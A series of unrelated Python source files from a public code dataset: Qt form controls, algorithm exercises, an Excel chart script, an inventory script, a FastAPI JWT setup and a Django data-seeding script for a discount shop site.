ceramatch.view.vcontrols_groups.controls.button import (Button)\n\nfrom PySide2 import (QtWidgets, QtCore, QtGui)\nfrom deposit.utils.fnc_files import (as_url, url_to_path)\n\nclass AttributeControl(object):\n\t\n\tsignal_changed = QtCore.Signal(str, str) # (name, value)\n\t\n\tdef __init__(self, name):\n\t\t\n\t\tself.name = name\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn \"\"\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tpass\n\t\n\tdef set_items(self, values):\n\t\t\n\t\tpass\n\t\n\t@QtCore.Slot()\n\tdef on_changed(self, *args):\n\t\t\n\t\tself.signal_changed.emit(self.name, self.get_value())\n\nclass LineEdit(AttributeControl, QtWidgets.QLineEdit):\n\t\n\tdef __init__(self, name):\n\t\t\n\t\tAttributeControl.__init__(self, name)\n\t\tQtWidgets.QLineEdit.__init__(self)\n\t\t\n\t\tself.textChanged.connect(self.on_changed)\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn self.text().strip()\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tself.blockSignals(True)\n\t\tself.setText(value)\n\t\tself.blockSignals(False)\n\nclass ComboBox(AttributeControl, QtWidgets.QComboBox):\n\t\n\tdef __init__(self, name):\n\t\t\n\t\tAttributeControl.__init__(self, name)\n\t\tQtWidgets.QComboBox.__init__(self)\n\t\t\n\t\tself.setEditable(True)\n\t\t\n\t\tself.currentTextChanged.connect(self.on_changed)\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn self.currentText().strip()\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tself.blockSignals(True)\n\t\tself.setCurrentText(value)\n\t\tself.blockSignals(False)\n\t\n\tdef set_items(self, values):\n\t\t\n\t\tself.blockSignals(True)\n\t\tcurrent_value = self.currentText()\n\t\tself.clear()\n\t\tif values:\n\t\t\tself.addItems(values)\n\t\tif current_value in values:\n\t\t\tself.setCurrentIndex(values.index(current_value))\n\t\telif current_value:\n\t\t\tself.setCurrentText(current_value)\n\t\tself.blockSignals(False)\n\nclass CheckBox(AttributeControl, QtWidgets.QCheckBox):\n\t\n\tdef __init__(self, name):\n\t\t\n\t\t\n\t\tAttributeControl.__init__(self, name)\n\t\tQtWidgets.QCheckBox.__init__(self)\n\t\t\n\t\tself.stateChanged.connect(self.on_changed)\n\t\n\tdef get_value(self):\n\t\t\n\t\treturn str(int(self.isChecked()))\n\t\n\tdef set_value(self, value):\n\t\t\n\t\tvalue_ = False\n\t\ttry:\n\t\t\tvalue_ = bool(int(value))\n\t\texcept:\n\t\t\traise Exception(\n\t\t\t\t\"Error: Could not convert attribute %s, value '%s' to bool\" % (self.name, str(value))\n\t\t\t)\n\t\tself.blockSignals(True)\n\t\tself.setChecked(value_)\n\t\tself.blockSignals(False)\n\t\n\tdef set_items(self, values):\n\t\t\n\t\tpass\n\nCONTROL_CLASSES = {\n\t\"LineEdit\": LineEdit,\n\t\"ComboBox\": ComboBox,\n\t\"CheckBox\": CheckBox,\n}\n\nclass Attributes(QtWidgets.QGroupBox):\n\t\n\tsignal_store_attributes = QtCore.Signal()\n\t\n\tdef __init__(self):\n\t\t\n\t\tQtWidgets.QGroupBox.__init__(self, \"Attributes\")\n\t\t\n\t\tself._attributes = {} # {lap_name: control, ...}\n\t\tself._labels = {} # {lap_name: label, ...}\n\t\tself._attributes_changed = False\n\t\t\n\t\tself.setStyleSheet(\"QGroupBox {font-weight: bold;}\")\n\t\tself.setLayout(QtWidgets.QVBoxLayout())\n\t\t\n\t\tself._form_frame = QtWidgets.QFrame()\n\t\tself._form_frame.setLayout(QtWidgets.QFormLayout())\n\t\tself._form_frame.layout().setContentsMargins(5, 5, 5, 5)\n\t\t\n\t\tself.store_button = Button(\"Store\", self.on_store)\n\t\t\n\t\tlabel = QtWidgets.QLabel(\n\t\t\t\"To modify attributes, use the LAP application - 'Edit Descriptors' 
function.\"\n\t\t)\n\t\tlabel.setWordWrap(True)\n\t\t\n\t\tself.layout().addWidget(self._form_frame)\n\t\tself.layout().addWidget(self.store_button)\n\t\tself.layout().addWidget(label)\n\t\t\n\t\tself.update_store_button()\n\t\n\t\n\t# ---- Signal handling\n\t# ------------------------------------------------------------------------\n\t@QtCore.Slot(str, str)\n\tdef on_changed(self, name, value):\n\t\t\n\t\tself._attributes_changed = True\n\t\tself.update_store_button()\n\t\n\t@QtCore.Slot(str, str)\n\tdef on_store(self):\n\t\t\n\t\tself.signal_store_attributes.emit()\n\t\n\t# ---- get/set\n\t# ------------------------------------------------------------------------\n\tdef update_store_button(self):\n\t\t\n\t\tstate = False\n\t\tif self._attributes_changed and self.get_data():\n\t\t\tstate = True\n\t\tself.store_button.setEnabled(state)\n\t\n\tdef populate(self, rows):\n\t\t# rows = [(label, ctrl_type, name), ...]\n\t\t\n\t\tself._attributes_changed = False\n\t\tself._attributes = {}\n\t\tself._labels = {}\n\t\tlayout = self._form_frame.layout()\n\t\tfor row in reversed(range(layout.rowCount())):\n\t\t\tlayout.removeRow(row)\n\t\tfor label, ctrl_type, name in rows:\n\t\t\tif ctrl_type not in CONTROL_CLASSES:\n\t\t\t\tcontinue\n\t\t\tself._attributes[name] = CONTROL_CLASSES[ctrl_type](name)\n\t\t\tself._attributes[name].signal_changed.connect(self.on_changed)\n\t\t\tself._labels[name] = label\n\t\t\tlayout.addRow(QtWidgets.QLabel(\"%s:\" % label), self._attributes[name])\n\t\tself.update_store_button()\n\t\n\tdef clear(self):\n\t\t\n\t\tself.populate([])\n\t\tself.update_store_button()\n\t\n\tdef get_data(self):\n\t\t# return data = {name: value, ...}\n\t\t\n\t\tdata = {}\n\t\tfor name in self._attributes:\n\t\t\tvalue = self._attributes[name].get_value()\n\t\t\tif value:\n\t\t\t\tdata[name] = value\n\t\t\n\t\treturn data\n\t\n\tdef set_data(self, data):\n\t\t# data = {name: (value, items), ...}; items = [value, ...]\n\t\t\n\t\tself._attributes_changed = False\n\t\tfor name in self._attributes:\n\t\t\tvalue, items = data.get(name, (\"\", []))\n\t\t\tif value is None:\n\t\t\t\tvalue = \"\"\n\t\t\tself._attributes[name].set_items([str(value) for value in items])\n\t\t\tself._attributes[name].set_value(str(value))\n\t\tself.update_store_button()\n","repo_name":"demjanp/CeraMatch","sub_path":"src/ceramatch/view/vcontrols_groups/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"9483876350","text":"import sys\nn,m = map(int, sys.stdin.readline().split())\nduck = list(map(int, sys.stdin.readline().split()))\nduck = sorted(duck)\n\n# def binary_search(array, target, start, end):\n# mid = (start+end)//2\n#\n# summ = [(i - array[mid]) for i in array if (i-array[mid])>0]\n# num_sum = sum(summ)\n# if start >= end:\n# return None\n# elif num_sum == target:\n# return array[mid]\n#\n# elif num_sum < target:\n# return binary_search(array, target, start, mid - 1)\n# elif num_sum > target:\n# return binary_search(array,target,mid + 1, end)\n#\n# result = binary_search(duck,m,0,n-1)\n# print(result)\nstart = 0\nend = max(duck)\nresult = 0\nwhile (start <= end):\n mid = (start + end) // 2\n summ = [(i - mid) for i in duck if (i - mid) > 0]\n num_sum = sum(summ)\n\n if num_sum < m:\n end = mid - 1\n else:\n result = mid\n start = mid + 
1\nprint(result)","repo_name":"lJINSUSl/DataStructure_Algorithm","sub_path":"백준모음/백준_알고리즘_이분탐색/나동빈_p201.py","file_name":"나동빈_p201.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71800428034","text":"import xlsxwriter\n\ncalismaKitabi = xlsxwriter.Workbook(\"COVID19 Türkiye Grafiği Açı.xlsx\")\nsayfaYapim = calismaKitabi.add_worksheet()\n\nboldDegeri = calismaKitabi.add_format({'bold': 1}) #Kalın Yazılacak Yazılara eklemek için style\n\nbasliklar = ['Durum', 'Sayılar']\n\nveriYapım = [\n ['Vefat Eden', 'Vaka', 'İyileşen'],\n [92,5698,42]\n]\n\nsayfaYapim.write_row('A1', basliklar, boldDegeri)\nsayfaYapim.write_column('A2', veriYapım[0])\nsayfaYapim.write_column('B2', veriYapım[1])\n\nchartYapim = calismaKitabi.add_chart({'type':'pie'})\n\nchartYapim.add_series({\n 'name':'Covid19 Grafiği',\n 'categories' : ['Sheet1',1,0,3,0],\n 'values' : ['Sheet1',1,1,3,1],\n 'points' : [\n {'fill' : {'color' : 'red'}},\n {'fill' : {'color' : 'purple'}},\n {'fill' : {'color' : 'yellow'}},\n ]\n})\nchartYapim.set_title({'name': 'COVİD19 TURKİYE GRAFİĞİ'})\nchartYapim.set_rotation(90)\nsayfaYapim.insert_chart('C2', chartYapim)\ncalismaKitabi.close()","repo_name":"erdiakpinar1/Python---Excel","sub_path":"13-TurkiyeCovidPie.py","file_name":"13-TurkiyeCovidPie.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39073973193","text":"import math\nimport numpy as np\n\n\ndef check_squares(tile, tile2):\n if np.array_equal(tile[-1], tile2[0]):\n return 1\n if np.array_equal(tile[0], tile2[-1]):\n return -1\n return 0\n\n \"\"\"print(tile)\n print()\n print(np.rot90(tile,1,(0,1))) #rotateleft\n print()\n print(np.flip(tile,0)) # Y Achse\n print()\n print(np.flip(tile, 1)) # X Achse\"\"\"\n\n\ndef task_1():\n with open(\"Input/20.txt\") as f:\n data = [x.split(\":\\n\") for x in f.read().split(\"\\n\\n\")]\n data = [[x.split(\"\\n\") for x in y] for y in data]\n for t in data:\n t[0] = int(t[0][0].split(\" \")[1])\n [[print(x) for x in y] for y in data]\n length = len(data) ** 0.5\n current_grid = np.zeros((int(length), int(length)))\n space = np.zeros((int(length), int(length), 10, 10))\n for i, d in enumerate(data):\n current_grid[int(math.floor(i / length)), int(i % length)] = d[0]\n for idx, x in enumerate(d[1]):\n for idy, y in enumerate(x):\n if y == \"#\":\n space[int(math.floor(i / length)), int(i % length), idx, idy] = 1\n check_squares(space, 0, 0, 1, 0)\n","repo_name":"Strawl/advent-of-code","sub_path":"2020/Calendar_2020/Day20.py","file_name":"Day20.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36477582500","text":"\n# class Student:\n# \"\"\"Developed by Nilesh in python class\"\"\"\n# def __init__(self,name, age,marks):\n# self.name=name\n# self.age=age\n# self.marks=marks\n#\n# def talk(self):\n# print(\"Hello myself\", self.name)\n# print(\"my age is\", self.age)\n# print(\"marks scored are\",self.marks)\n#\n# s1=Student(\"Nilesh\", 20, 99)\n# s1.talk()\n\n\nclass Student:\n def __init__(self,x,y,z):\n self.name=x\n self.rollno=y\n self.marks=z\n\n def display(self):\n 
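The feeding snippet above is the standard "binary search on the answer" pattern: the predicate (cutting at height mid still yields at least m) is monotone, so the largest feasible height is found in O(log(max height)) predicate calls. The same pattern as a reusable function:

def max_feasible(lo: int, hi: int, feasible) -> int:
    # Largest value in [lo, hi] for which feasible() holds, given
    # that feasible is True on a prefix of the range; the loop above
    # instantiates this with feasible(h) = "sum of cuts at h >= m".
    best = lo
    while lo <= hi:
        mid = (lo + hi) // 2
        if feasible(mid):
            best = mid
            lo = mid + 1
        else:
            hi = mid - 1
    return best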
print(\"Name:{}\\nRollNo:{}\\nMarks:{}\".format(self.name,self.rollno,self.marks))\n\ns1=Student(\"Nilesh\",20,99)\ns1.display()\n\ns2=Student(\"Mansi\",20,99)\ns2.display()","repo_name":"nileshsrivastava27/Python_program","sub_path":"class_1.py","file_name":"class_1.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6607615434","text":"class Solution(object):\n def originalDigits(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n nums = {'zero':'0', 'one':'1', 'two':'2', 'three':'3', 'four':'4', 'five':'5', 'six':'6', 'seven':'7',\n 'eight':'8', 'nine':'9'}\n flag1 = {'z': 'zero', 'w': 'two','x': 'six', 'u': 'four', 'g': 'eight'}\n flag2 = {'t': 'three', 'f': 'five', 'o': 'one', 's': 'seven'}\n flag3 = {'i': 'nine'}\n letter = {}\n res = ''\n\n for v in s:\n if v in letter:\n letter[v] += 1\n else:\n letter[v] = 1\n # print letter\n\n for flag in [flag1, flag2, flag3]:\n for k in flag.keys():\n if k in letter and letter[k]:\n res += nums[flag[k]]*letter[k]\n n = letter[k]\n for v in flag[k]:\n letter[v] -= n\n res = sorted(res)\n return ''.join(res)\n","repo_name":"qinqiang-huihui/leetcode_learning","sub_path":"423. Reconstruct Original Digits from English/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9076968057","text":"#to open the json doc\r\nfd = open(\"/content/dhanu1.json\",'r')\r\nr = fd.read()\r\nfd.close()\r\nimport json\r\ndhanu1 = json.loads(r)\r\n\r\n\r\n\r\n#to get new prod_id,name,pr,qn\r\nprod_id = str(input(\"Enter product id:\"))\r\nname = str(input(\"Enter name:\"))\r\npr = int(input(\"Enter price:\"))\r\nqn = int(input(\"Enter quantity:\"))\r\n\r\nmanu[prod_id] = {'name': name, 'pr': pr, 'qn': qn}\r\n\r\njs = json.dumps(dhanu1)\r\n\r\nfd = open(\"/content/dhanu1.json\",'w')\r\nfd.write(js)\r\nfd.close()\r\n\r\n\r\n\r\n#to open the updated doc\r\nimport json\r\n\r\nfd = open(\"/content/dhanu1.json\",'r')\r\nr = fd.read()\r\nfd.close()\r\n\r\nmanu = json.loads(r)\r\n\r\n\r\n\r\n#to get prod_id and quantity from to to buy\r\nd_prod = str(input(\"Enter the product_Id: \"))\r\nd_quant = int(input(\"Enter the quantity: \"))\r\nif dhanu1[d_prod]['qn']<=0:\r\n print(\"product is not available in store\")\r\nelif d_quant>dhanu1[d_prod]['qn']:\r\n print(\"That much quantity is not available\")\r\nelse:\r\n print(\"Product: \", dhanu1[d_prod]['name'])\r\n print(\"Price: \", dhanu1[d_prod]['pr'])\r\n print(\"Billing Amount: \", dhanu1[d_prod]['pr'] * d_quant)\r\n dhanu1[d_prod]['qn'] = dhanu1[d_prod]['qn'] - d_quant\r\n\r\n\r\n#to update the file as per sales\r\nimport json\r\n\r\nfd = open(\"/content/dhanu1.json\",'r')\r\nr = fd.read()\r\nfd.close()\r\n\r\ndhanu1 = json.loads(r)\r\n\r\n\r\n\r\n#to print the receipt\r\nrecepit={'prod' : d_prod, 'qn' : d_quant, 'amount': dhanu1[d_prod]['pr'] * d_quant}\r\nreceipt\r\n\r\n\r\n","repo_name":"Dhanushguptha19/ETG-project1-json-","sub_path":"IMS_code.py","file_name":"IMS_code.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13403846570","text":"import inspect\nimport re\n\nfrom fastapi import FastAPI\nfrom fastapi.openapi.utils import get_openapi\nfrom fastapi.routing import APIRoute\nfrom fastapi_jwt_auth import AuthJWT\n\nfrom routes.auth.auth_routes import auth_router\nfrom 
routes.conferences.conference_routes import conference_router\nfrom database.auth.schema import Setting\nfrom database.database import Base, engine\n\n\nBase.metadata.create_all(bind=engine)\n\n\napp = FastAPI()\n\n\ndef custom_openapi():\n if app.openapi_schema:\n return app.openapi_schema\n\n openapi_schema = get_openapi(\n title=\"conference maker\",\n version=\"1.0\",\n description=\"An API for conference making\",\n routes=app.routes,\n )\n\n openapi_schema[\"components\"][\"securitySchemes\"] = {\n \"Bearer Auth\": {\n \"type\": \"apiKey\",\n \"in\": \"header\",\n \"name\": \"Authorization\",\n \"description\": \"Enter: **'Bearer <JWT>'**, where JWT is the access token\"\n }\n }\n\n # Get all routes where jwt_optional() or jwt_required\n api_router = [route for route in app.routes if isinstance(route, APIRoute)]\n\n for route in api_router:\n path = getattr(route, \"path\")\n endpoint = getattr(route, \"endpoint\")\n methods = [method.lower() for method in getattr(route, \"methods\")]\n\n for method in methods:\n # access_token\n if (\n re.search(\"jwt_required\", inspect.getsource(endpoint)) or\n re.search(\"fresh_jwt_required\", inspect.getsource(endpoint)) or\n re.search(\"jwt_optional\", inspect.getsource(endpoint))\n ):\n openapi_schema[\"paths\"][path][method][\"security\"] = [\n {\n \"Bearer Auth\": []\n }\n ]\n\n app.openapi_schema = openapi_schema\n return app.openapi_schema\n\n\napp.openapi = custom_openapi\n\n\n@AuthJWT.load_config\ndef get_config():\n return Setting()\n\n\napp.include_router(auth_router)\napp.include_router(conference_router)\n","repo_name":"MhmdMhdi10/fastapi_conference_microservice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20257248407","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom django.utils import timezone\nfrom datetime import date\nfrom django.conf import settings\nimport random\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"kulik.settings\")\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n\n\nfrom discount.models import Payment, Shop, Product, User, ProductMail, ModelHistory, ProductType, FilterValue\nfrom discount import models\nfrom discount import tasks\nfrom collections import OrderedDict\nfrom django.db.models import Q\n\nif True:\n\n ProductType.objects.all().delete()\n models.Brand.objects.all().delete()\n FilterValue.objects.all().delete()\n models.SubscriptionType.objects.all().delete()\n models.Shop.objects.all().delete()\n models.Product.objects.all().delete()\n\n\n\n top_parent = models.ProductType()\n top_parent.title = 'Все'\n top_parent.alias = settings.ALIAS_ALL\n top_parent.save()\n\n\n colors_tuple = (\n 'бежевый',\n 'белый',\n 'бирюзовый',\n 'бордовый',\n 'бронзовый',\n 'голубой',\n 'горчичный',\n 'желтый',\n 'зеленый',\n 'золотой',\n 'коралловый',\n 'коричневый',\n 'красный',\n 'молочный',\n 'мультиколор',\n 'оранжевый',\n 'прозрачный',\n 'розовый',\n 'серебряный',\n 'серый',\n 'синий',\n 'фиолетовый',\n 'фуксия',\n 'хаки',\n 'черный'\n )\n\n sizes_man_tuple = (\n 42,\n 44,\n 46,\n 48,\n 50,\n 52,\n 54,\n 56,\n 58,\n 60,\n 62,\n 64,\n 66,\n 68,\n )\n\n sizes_women_tuple= (\n 38,\n 40,\n 42,\n 44,\n 46,\n 48,\n 50,\n 52,\n 54,\n 56,\n 58,\n 60,\n 62,\n 64,\n 66,\n 68,\n )\n\n sizes_childs_tuple = (\n 28,\n 30,\n 33,\n 34,\n 36,\n 37,\n 39,\n 50,\n 53,\n 56,\n 59,\n 
62,\n 68,\n 70,\n 71,\n 74,\n 75,\n 80,\n 85,\n 86,\n 90,\n 92,\n 96,\n 98,\n 100,\n 104,\n 110,\n 116,\n 118,\n 120,\n 122,\n 128,\n 126,\n 130,\n 134,\n 137,\n 140,\n 146,\n 147,\n 152,\n 158,\n 164,\n 170,\n 176,\n )\n\n\n sizes_shoes_tuple = (\n 18,\n 19,\n 20,\n 21,\n 22,\n 23,\n 24,\n 25,\n 27,\n 28,\n 29,\n 29.5,\n 30,\n 31,\n 32,\n 32.5,\n 33,\n 33.5,\n 34,\n 34.5,\n 35,\n 35.5,\n 36,\n 36.5,\n 37,\n 37.5,\n 38,\n 39,\n 40,\n 41,\n 42,\n 42.5,\n 43,\n 43.5,\n 44,\n 44.5,\n 45,\n 45.5,\n 46,\n 46.5,\n 47,\n 47.5,\n 48,\n 48.5,\n 49,\n 50.5,\n )\n\n\n\n for elem in colors_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_COLOR)\n\n\n\n for elem in sizes_childs_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_CHILDS)\n\n for elem in sizes_women_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_WOMAN)\n\n for elem in sizes_man_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_MAN)\n\n for elem in sizes_shoes_tuple:\n FilterValue.objects.create(title=elem, filter_type=models.FILTER_TYPE_SIZE_SHOES)\n\n\n\n with open('categ.csv') as file:\n cats = OrderedDict()\n for line in file:\n line_as_list = line.split(';')\n if line_as_list and line_as_list[0] and line_as_list[0] == 'key':\n continue\n key = int(line_as_list[0])\n cat = {}\n cats[key] = cat\n\n cat['key'] = key\n cat['name'] = line_as_list[1]\n cat['parent'] = line_as_list[6]\n\n\n pt_list=[]\n key_list=[]\n for k in cats:\n cat = cats[k]\n pt = ProductType()\n pt.title = cat['name']\n if cat.get('parent', None):\n parent_elem = cats[int(cat['parent'])]\n parent = ProductType.objects.get(pk=parent_elem['pk'])\n pt.parent = parent\n else:\n pt.parent = top_parent\n print(pt)\n pt.save()\n pt_list.append(pt)\n key_list.append(pt.pk)\n cat['pk'] = pt.pk\n\n\n\n\n pt = models.ProductType.objects.get(level=1, title='Женщинам')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_WOMAN)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 1\n pt.alias = settings.ALIAS_WOMEN\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Мужчинам')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_MAN)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 2\n pt.alias = settings.ALIAS_MEN\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Детям')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_CHILDS)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 3\n pt.alias = settings.ALIAS_CHILDREN\n pt.save()\n\n\n pt = models.ProductType.objects.get(level=1, title='Обувь')\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_SIZE_SHOES)\n models.FilterValueToProductType.objects.create(product_type=pt, filter_type=models.FILTER_TYPE_COLOR)\n pt.weight = 4\n pt.alias = settings.ALIAS_SHOES\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Аксессуары')\n pt.weight = 5\n pt.alias = settings.ALIAS_ACCESSORIES\n pt.save()\n\n\n pt = models.ProductType.objects.get(level=1, title='Товары для дома')\n pt.weight = 6\n pt.alias = settings.ALIAS_HOME\n pt.save()\n\n pt = 
models.ProductType.objects.get(level=1, title='Ювелирные изделия')\n pt.weight = 7\n pt.alias = settings.ALIAS_JEWELRY\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Игрушки')\n pt.weight = 8\n pt.alias = settings.ALIAS_TOYS\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Спорт')\n pt.weight = 9\n pt.alias = settings.ALIAS_SPORT\n pt.save()\n\n pt = models.ProductType.objects.get(level=1, title='Красота')\n pt.weight = 10\n pt.alias = settings.ALIAS_BEAUTY\n pt.save()\n\n\n\n\n\n models.SubscriptionType.objects.create(\n title='Экспресс',\n period_points=7,\n max_products= 2,\n price=950,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Эконом',\n period_points=1,\n max_products=5,\n price=3900,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n models.SubscriptionType.objects.create(\n title='Профессионал',\n period_points=1,\n max_products=30,\n price=12900,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Супер эконом',\n period_points=1,\n max_products=2,\n price=2500,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n models.SubscriptionType.objects.create(\n title='Стандарт',\n period_points=1,\n max_products=10,\n price=6900,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_MONTH,\n\n )\n\n\n\n\n models.SubscriptionType.objects.create(\n title='Бонусный',\n period_points=5,\n max_products=1,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Пробная-2',\n period_points=15,\n max_products=2,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n available=False,\n\n )\n\n\n models.SubscriptionType.objects.create(\n title='Пробная-5',\n period_points=15,\n max_products=5,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n available=False,\n\n )\n\n\nmodels.SubscriptionType.objects.create(\n title='Пробная-10',\n period_points=15,\n max_products=10,\n price=0,\n period_type=models.SUBSCRIPTION_PERIOD_TYPE_DAY,\n available=False,\n\n )\n\n\n\ntry:\n u = models.User.objects.get(username='tatamo')\nexcept:\n u = models.User.objects.create(username='tatamo', email='admin@tatamo.ru', password='1234567')\n\n\ns = models.Shop.objects.create(title='Татамо',\n status=models.SHOP_STATUS_PROJECT,\n image='discount_shop/757v20s7dk0o68j0ft9wl0h0zqgaprj7x71f6f4u79luuox19d.png',\n user=u,\n )\nb = models.Brand.objects.create(title='Татамо')\n\nproduct_images = [\n'discount_product/t4dolelk9yj6sl4cv0v770fdk78guednhmimnn7s44h3dt1gwe.jpg',\n'discount_product/dlbyk6rlus353m6d28duuktnnsc0pymc2nlfeq8jr11wbjgg1m.jpg',\n'discount_product/w57kasjqguf2945ggo5s9h5ov610uw5jw243pn4ncg6ukl7p73.jpg',\n'discount_product/eogoz737c64y6nfzcgudnst3ilpys861y61yne460hx17mect9.jpg',\n'discount_product/renrh6uax66zr9mvcej8wob3ccmrxzz6ezwgodsw45xepv2aa6.jpg',\n]\n\nbanners = [\n'discount_product_banner/7hmtc4fdmr6y7vyf5x5eszbcadb5zuxh0d5y3cv4jrwpr6wgqs.jpg',\n'discount_product_banner/q4m8wddfe7tvivn0zyp9ep2h2ea4lzy7tjgtk3vtmrwzy1ftkq.jpg',\n'discount_product_banner/r0diavzk0vsbu2v6rn1hpz13z672yr2hcoip8rmrva8jn84ode.jpg',\n\n]\n\nmodels.ShopsToUsers.objects.create(shop=s, user=u, confirmed=True)\n\ncategs = models.ProductType.objects.filter(level=1)\nfor categ in categs:\n pt = models.ProductType.objects.filter(has_childs=False).filter(Q(parent=categ) | Q(parent__parent=categ) | Q(parent__parent__parent=categ)).earliest('created')\n\n 
random.shuffle(product_images)\n for image in product_images:\n product = Product.objects.create(title='Рекламная акция Татамо', body='Рекламная акция Татамо',\n normal_price=100, stock_price=1,\n start_date=models.get_today(),\n end_date=models.get_today() + timezone.timedelta(days=365),\n code='12345', product_type=pt,\n shop=s,\n user=u,\n ad=True,\n brand=b,\n status=models.STATUS_PROJECT,\n compound=''\n )\n models.ProductImage.objects.create(\n product=product,\n image=image,\n weight=1,\n )\nfor banner in banners:\n\n product = Product.objects.create(title='Рекламная акция Татамо', body='Рекламная акция Татамо',\n normal_price=100, stock_price=1,\n start_date=models.get_today(),\n end_date=models.get_today() + timezone.timedelta(days=365),\n code='12345', product_type=pt,\n shop=s,\n user=u,\n ad=True,\n brand=b,\n status=models.STATUS_PROJECT,\n compound=''\n )\n models.ProductBanner.objects.create(product=product, banner=banner, status=models.BANNER_STATUS_APPROVED)\n\n\n\nfrom polls.models import Poll, Answer\n\npoll = Poll.objects.create(question='Как Вы узнали о Татамо?')\n\nAnswer.objects.create(poll=poll, body='Instagram', weight=1)\nAnswer.objects.create(poll=poll, body='Facebook', weight=2)\nAnswer.objects.create(poll=poll, body='Vkontakte', weight=3)\nAnswer.objects.create(poll=poll, body='От друзей', weight=4)\nAnswer.objects.create(poll=poll, body='SMS/EMAIL рассылка', weight=5)\nAnswer.objects.create(poll=poll, body='Статья в интернет или запись в блоге', weight=6)\nAnswer.objects.create(poll=poll, body='Реклама в интернет', weight=7)\nAnswer.objects.create(poll=poll, body='Другое', weight=8)\n\n\nif True:\n #import random\n #************************************\n u = models.User.objects.get(pk=1)\n today = models.get_today()\n\n for i in range(150):\n print('brand', i)\n models.Brand.objects.create(title='Бренд-{0}'.format(i))\n\n brands = models.Brand.objects.all()\n\n for i in range(80):\n print('shop', i)\n s = models.Shop.objects.create(title='Магазин-{0}'.format(i),\n status=models.SHOP_STATUS_PUBLISHED,\n custom_adress='Москва, улица Намоткина, дом 25-а корпус 8 строение 4 офис 234',\n image='discount_shop/n5hpt7yrg7b75165hqwmzqu6xa0kf9qa10h2qojqx284x4wscv.png',\n user=u,\n )\n\n sub_pro = models.SubscriptionType.objects.get(title='Профессионал')\n\n models.Subscription.objects.create(\n shop=s,\n start_date=today,\n end_date=today+timezone.timedelta(days=50),\n subscription_type=sub_pro,\n auto_pay=True,\n user=u,\n )\n models.Payment.increase(s, u, 10000000)\n\n models.ShopsToBrands.objects.create(brand=random.choice(brands), shop=s)\n models.ShopsToBrands.objects.create(brand=random.choice(brands), shop=s)\n models.ShopsToBrands.objects.create(brand=random.choice(brands), shop=s)\n\n models.ShopPhone.objects.create(shop=s, phone='8(123)456-78-90')\n models.ShopPhone.objects.create(shop=s, phone='8(123)456-78-90')\n models.ShopPhone.objects.create(shop=s, phone='8(123)456-78-90')\n\n\n\n pts = models.ProductType.objects.filter(has_childs=False)\n shops = models.Shop.objects.all().exclude(title='Татамо')\n\n\n for i in range(350):\n print('product', i)\n\n normal_price = random.choice(range(200, 20000))\n stock_price = random.choice(range(100, normal_price-20))\n product = Product.objects.create(title='Тестовая 